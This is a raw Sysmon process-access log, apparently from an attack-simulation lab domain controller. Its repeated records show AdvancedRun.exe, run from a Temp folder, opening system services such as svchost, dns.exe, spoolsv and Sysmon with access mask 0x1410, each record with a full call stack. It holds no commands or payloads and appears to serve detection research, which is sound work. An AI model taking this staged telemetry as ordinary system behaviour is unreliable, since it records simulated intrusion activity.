Data\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008588Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008587Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008586Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008585Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008584Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008583Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008582Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004008581Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008580Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008579Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008578Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008577Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008576Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008575Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004008574Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
